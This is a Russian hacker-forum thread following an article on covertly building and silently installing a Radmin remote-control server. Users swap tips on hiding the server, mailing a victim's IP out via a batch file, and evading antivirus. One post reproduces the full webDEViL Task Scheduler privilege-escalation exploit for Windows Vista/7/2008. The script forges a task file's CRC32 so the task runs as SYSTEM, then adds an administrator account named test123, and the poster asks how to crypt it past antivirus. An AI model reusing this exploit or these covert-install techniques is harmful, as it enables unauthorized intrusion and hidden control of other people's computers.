1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Наши статьи", создана пользователем Iindigo, 16 дек 2010.

  1. Иосиф Джугашвили
    Симпатии:
    0
    Как протестить IP.bat?

    Други мои, если так не сложно будет, вышлите на мыло ken233@mail.ru txt файл IP.bat, сам поправлю... ХЗ почему, не могу на своём компе протестить IP.exe. При чём, изменения в реестре происходят однозначно, но на мыло ничего не высылается, отсюда закрадывается сомнение в правильности написания мной IP.bat и уверенность в собственной криворукости крепнет... Не дайте разочароваться начинающему хацкеру... Заранее благодарен!!!:-[
     
    26 окт 2012
  2. wera87
    wera87 Новичок
    Симпатии:
    4
    ******************

    попробуй в батнике сменить порт с 25 на 587 . (у меня пашет на 587)
     

    Вложения:

    • IP.txt
      Размер файла:
      411 байт
      Просмотров:
      15
    26 окт 2012
  3. MrsPalevo2012
    MrsPalevo2012 Новичок
    Симпатии:
    0
    А если yandex.ua? везде поменять на ua или оставить ru?
     
    21 янв 2013
  4. pipka11
    pipka11 Новичок
    Симпатии:
    0
    Не приходит .txt с реальным ip.
    .txt пустой, в письме написано - Invalid Response.
    пересобирал много раз не помагает.
     
    25 фев 2013
  5. zaxtone
    zaxtone Новичок
    Симпатии:
    0
    Что сделал не так?

    [​IMG]
     
    6 июн 2013
  6. султан230
    султан230 Новичок
    Симпатии:
    0
    Вопрос может быть глупый,но если я под нат я смогу таким способом удаленное администратирование получить?
     
    29 июн 2013
  7. art22
    art22 Новичок
    Симпатии:
    3
    Сейчас палится антивирусами? стоит тратить время и собрать Радмин?
     
    1 июл 2013
  8. tatarin26
    tatarin26 Новичок
    Симпатии:
    0
    добрый день. скачал msi пакет сервера Radmin 3.4 (не требует активации, скрывает иконку в трее, не пишется в пуск и установленные программы) запускаю Radmin MSI Configurator, указываю ему на скачанный msi пакет сервера Radmin 3.4 а в ответ вижу указанные файлы MSI не является установочным файлом radmin server версии 3.4.1 или более поздней версии или не исключено, что MSI файл поврежден. Что делать не знаю:(
     
    11 сен 2013
  9. Talory
    Talory Новичок
    Симпатии:
    0
    Если не ошибаюсь вроде нашёл исходник poc.wsf
    PHP:
    # Exploit Title: Windows Task Scheduler Privilege Escalation 0day
    # Date: 20-11-2010
    # Author: webDEViL
    # Tested on: Windows 7/2008 x86/x64


    <job id="tasksch-wD-0day">
    <
    script language="Javascript">

    crc_table = new Array(
      
    0x000000000x770730960xEE0E612C0x990951BA0x076DC419,
      
    0x706AF48F0xE963A5350x9E6495A30x0EDB88320x79DCB8A4,
      
    0xE0D5E91E0x97D2D9880x09B64C2B0x7EB17CBD0xE7B82D07,
      
    0x90BF1D910x1DB710640x6AB020F20xF3B971480x84BE41DE,
      
    0x1ADAD47D0x6DDDE4EB0xF4D4B5510x83D385C70x136C9856,
      
    0x646BA8C00xFD62F97A0x8A65C9EC0x14015C4F0x63066CD9,
      
    0xFA0F3D630x8D080DF50x3B6E20C80x4C69105E0xD56041E4,
      
    0xA26771720x3C03E4D10x4B04D4470xD20D85FD0xA50AB56B,
      
    0x35B5A8FA0x42B2986C0xDBBBC9D60xACBCF9400x32D86CE3,
      
    0x45DF5C750xDCD60DCF0xABD13D590x26D930AC0x51DE003A,
      
    0xC8D751800xBFD061160x21B4F4B50x56B3C4230xCFBA9599,
      
    0xB8BDA50F0x2802B89E0x5F0588080xC60CD9B20xB10BE924,
      
    0x2F6F7C870x58684C110xC1611DAB0xB6662D3D0x76DC4190,
      
    0x01DB71060x98D220BC0xEFD5102A0x71B185890x06B6B51F,
      
    0x9FBFE4A50xE8B8D4330x7807C9A20x0F00F9340x9609A88E,
      
    0xE10E98180x7F6A0DBB0x086D3D2D0x91646C970xE6635C01,
      
    0x6B6B51F40x1C6C61620x856530D80xF262004E0x6C0695ED,
      
    0x1B01A57B0x8208F4C10xF50FC4570x65B0D9C60x12B7E950,
      
    0x8BBEB8EA0xFCB9887C0x62DD1DDF0x15DA2D490x8CD37CF3,
      
    0xFBD44C650x4DB261580x3AB551CE0xA3BC00740xD4BB30E2,
      
    0x4ADFA5410x3DD895D70xA4D1C46D0xD3D6F4FB0x4369E96A,
      
    0x346ED9FC0xAD6788460xDA60B8D00x44042D730x33031DE5,
      
    0xAA0A4C5F0xDD0D7CC90x5005713C0x270241AA0xBE0B1010,
      
    0xC90C20860x5768B5250x206F85B30xB966D4090xCE61E49F,
      
    0x5EDEF90E0x29D9C9980xB0D098220xC7D7A8B40x59B33D17,
      
    0x2EB40D810xB7BD5C3B0xC0BA6CAD0xEDB883200x9ABFB3B6,
      
    0x03B6E20C0x74B1D29A0xEAD547390x9DD277AF0x04DB2615,
      
    0x73DC16830xE3630B120x94643B840x0D6D6A3E0x7A6A5AA8,
      
    0xE40ECF0B0x9309FF9D0x0A00AE270x7D079EB10xF00F9344,
      
    0x8708A3D20x1E01F2680x6906C2FE0xF762575D0x806567CB,
      
    0x196C36710x6E6B06E70xFED41B760x89D32BE00x10DA7A5A,
      
    0x67DD4ACC0xF9B9DF6F0x8EBEEFF90x17B7BE430x60B08ED5,
      
    0xD6D6A3E80xA1D1937E0x38D8C2C40x4FDFF2520xD1BB67F1,
      
    0xA6BC57670x3FB506DD0x48B2364B0xD80D2BDA0xAF0A1B4C,
      
    0x36034AF60x41047A600xDF60EFC30xA867DF550x316E8EEF,
      
    0x4669BE790xCB61B38C0xBC66831A0x256FD2A00x5268E236,
      
    0xCC0C77950xBB0B47030x220216B90x5505262F0xC5BA3BBE,
      
    0xB2BD0B280x2BB45A920x5CB36A040xC2D7FFA70xB5D0CF31,
      
    0x2CD99E8B0x5BDEAE1D0x9B64C2B00xEC63F2260x756AA39C,
      
    0x026D930A0x9C0906A90xEB0E363F0x720767850x05005713,
      
    0x95BF4A820xE2B87A140x7BB12BAE0x0CB61B380x92D28E9B,
      
    0xE5D5BE0D0x7CDCEFB70x0BDBDF210x86D3D2D40xF1D4E242,
      
    0x68DDB3F80x1FDA836E0x81BE16CD0xF6B9265B0x6FB077E1,
      
    0x18B747770x88085AE60xFF0F6A700x66063BCA0x11010B5C,
      
    0x8F659EFF0xF862AE690x616BFFD30x166CCF450xA00AE278,
      
    0xD70DD2EE0x4E0483540x3903B3C20xA76726610xD06016F7,
      
    0x4969474D0x3E6E77DB0xAED16A4A0xD9D65ADC0x40DF0B66,
      
    0x37D83BF00xA9BCAE530xDEBB9EC50x47B2CF7F0x30B5FFE9,
      
    0xBDBDF21C0xCABAC28A0x53B393300x24B4A3A60xBAD03605,
      
    0xCDD706930x54DE57290x23D967BF0xB3667A2E0xC4614AB8,
      
    0x5D681B020x2A6F2B940xB40BBE370xC30C8EA10x5A05DF1B,
      
    0x2D02EF8D
    );

    var 
    hD='0123456789ABCDEF';

    function 
    dec2hex(d) {
    h='';
    for (
    i=0;i<8;i++) {
    hD.charAt(d&15)+h;
    >>>= 4;
    }
    return 
    h;
    }
    function 
    encodeToHex(str){
        var 
    r="";
        var 
    e=str.length;
        var 
    c=0;
        var 
    h;
        while(
    c<e){
            
    h=str.charCodeAt(c++).toString(16);
            while(
    h.length<3h="0"+h;
            
    r+=h;
        }
        return 
    r;
    }
    function 
    decodeFromHex(str){
        var 
    r="";
        var 
    e=str.length;
        var 
    s=0;
        while(
    e>1){
            
            
    r=r+String.fromCharCode("0x"+str.substring(s,s+2));
            
            
    s=s+2;
            
    e=e-2;
        }
        
        return 
    r;
        
    }


    function 
    calc_crc(anyForm) {

    anyTextString=decodeFromHex(anyForm);

    Crc_value 0xFFFFFFFF;
    StringLength=anyTextString.length;
    for (
    i=0i<StringLengthi++) {
    tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
    Table_value crc_table[tableIndex];
    Crc_value >>>= 8;
    Crc_value ^= Table_value;
    }
    Crc_value ^= 0xFFFFFFFF;
    return 
    dec2hex(Crc_value);

    }

    function 
    rev_crc(leadString,endString,crc32) {
    //
    // First, we calculate the CRC-32 for the initial string
    //
        
    anyTextString=decodeFromHex(leadString);
        
       
    Crc_value 0xFFFFFFFF;
       
    StringLength=anyTextString.length;
       
    //document.write(alert(StringLength));
       
    for (var i=0i<StringLengthi++) {
          
    tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
          
    Table_value crc_table[tableIndex];
          
    Crc_value >>>= 8;
          
    Crc_value ^= Table_value;
       }
    //
    // Second, we calculate the CRC-32 without the final string
    //
       
    crc=parseInt(crc32,16);
       
    crc ^= 0xFFFFFFFF;
       
    anyTextString=decodeFromHex(endString);
       
    StringLength=anyTextString.length;
       for (var 
    i=0i<StringLengthi++) {
          
    tableIndex=0;
          
    Table_value crc_table[tableIndex];
          while (((
    Table_value crc) >>> 24)  & 0xFF) {
             
    tableIndex++;
             
    Table_value crc_table[tableIndex];
          }
          
    crc ^= Table_value;
          
    crc <<= 8;
          
    crc |= tableIndex anyTextString.charCodeAt(StringLength -1);
       }
    //
    // Now let's find the 4-byte string
    //
       
    for (var i=0i<4i++) {
          
    tableIndex=0;
          
    Table_value crc_table[tableIndex];
          while (((
    Table_value crc) >>> 24)  & 0xFF) {
             
    tableIndex++;
             
    Table_value crc_table[tableIndex];
          }
          
    crc ^= Table_value;
          
    crc <<= 8;
          
    crc |= tableIndex;
       }
       
    crc ^= Crc_value;
    //
    // Finally, display the results
    //
       
    var TextString=dec2hex(crc);
       var 
    Teststring='';
    Teststring=TextString.substring(6,8);
    Teststring+=TextString.substring(4,6);
    Teststring+=TextString.substring(2,4);
    Teststring+=TextString.substring(0,2);
       return 
    Teststring
    }
    function 
    decodeFromHex(str){
        var 
    r="";
        var 
    e=str.length;
        var 
    s=0;
        while(
    e>1){
            
            
    r=r+String.fromCharCode("0x"+str.substring(s,s+2));
            
            
    s=s+2;
            
    e=e-2;
        }
        
        return 
    r;
        
    }
    </script>



    <script language="VBScript">
    dim output
    set output = wscript.stdout
    output.writeline " Task Scheduler 0 day - Privilege Escalation "
    output.writeline " Should work on Vista/Win7/2008 x86/x64"
    output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
    biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set a = fso.CreateTextFile(biatchFile, True)
    a.WriteLine ("net user /add test123 test123")
    a.WriteLine ("net localgroup administrators /add test123")
    a.WriteLine ("schtasks /delete /f /TN wDw00t")

    Function ReadByteArray(strFileName)
    Const adTypeBinary = 1
    Dim bin
        Set bin = CreateObject("ADODB.Stream")
        bin.Type = adTypeBinary
        bin.Open
        bin.LoadFromFile strFileName
        ReadByteArray = bin.Read
    'output.writeline ReadByteArray
    End Function

    Function OctetToHexStr (arrbytOctet)
     Dim k
     OctetToHexStr = ""
     For k = 3 To Lenb (arrbytOctet)
      OctetToHexStr = OctetToHexStr _
            & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
     Next
     End Function
    strFileName="C:\windows\system32\tasks\wDw00t"

    hexXML = OctetToHexStr (ReadByteArray(strFileName))
    'output.writeline hexXML
    crc32 = calc_crc(hexXML)
    output.writeline "Crc32 Original: "+crc32


    Set xmlDoc = CreateObject("Microsoft.XMLDOM")
    'permissions workaround
    'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
    'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
    Set objShell = WScript.CreateObject("WScript.Shell")
    Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")

    Do Until objExecObject.StdOut.AtEndOfStream
     strLine = strLine & objExecObject.StdOut.ReadLine()
    Loop
    hexXML = "FFFE3C00"+OctetToHexStr(strLine)
    'output.writeline hexXML
    Set ts = fso.createtextfile ("wDw00t.xml")
    For n = 1 To (Len (hexXML) - 1) step 2
     ts.write Chr ("&h" & Mid (hexXML, n, 2))
    Next
    ts.close

    xmlDoc.load "wDw00t.xml"
    Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
    Author.text = "LocalSystem"
    Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
    UserId.text = "S-1-5-18"
    xmldoc.save(strFileName)

    hexXML = OctetToHexStr (ReadByteArray(strFileName))

    leadString=hexXML+"3C0021002D002D00"
    endString="2D002D003E00"
    'output.writeline leadString
    impbytes=rev_crc(leadString,endString,crc32)
    output.writeline "Crc32 Magic Bytes: "+impbytes

    finalString = leadString+impbytes+endString
    forge = calc_crc(finalString)
    output.writeline "Crc32 Forged: "+forge

    strHexString="FFFE"+finalString
    Set fso = CreateObject ("scripting.filesystemobject")
    Set stream = CreateObject ("adodb.stream")

    Set ts = fso.createtextfile (strFileName)

    For n = 1 To (Len (strHexString) - 1) step 2
     ts.write Chr ("&h" & Mid (strHexString, n, 2))
    Next
    ts.close


    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "schtasks /change /TN wDw00t /disable",,True
    objShell.Run "schtasks /change /TN wDw00t /enable",,True
    objShell.Run "schtasks /run /TN wDw00t",,True

    </script>
    </job>

    Если это он, то подскажите чем моно криптануть, чтоб не палился? Пробывал ExeScript, палится:(
    п.с. как кстати РОС ведёт себя на вин 8?
     
    Последнее редактирование: 7 ноя 2013
    7 ноя 2013
  10. icehacker
    icehacker Новичок
    Симпатии:
    0
    Большое спасибо автору и админу! Все коротко и ясно.
    Когда то давным-давно (лет 5 тому назад) нашел подобный мануал, но там были непонятки, тут как я вижу, все на блюдечке.
    Буду сегодня тестить. :)
     
    17 дек 2015
  11. Tarabas
    Tarabas Новичок
    Симпатии:
    0
    данный сабж работает на win10 с автоапдейтами?
     
    28 дек 2015

Поделиться этой страницей

Загрузка...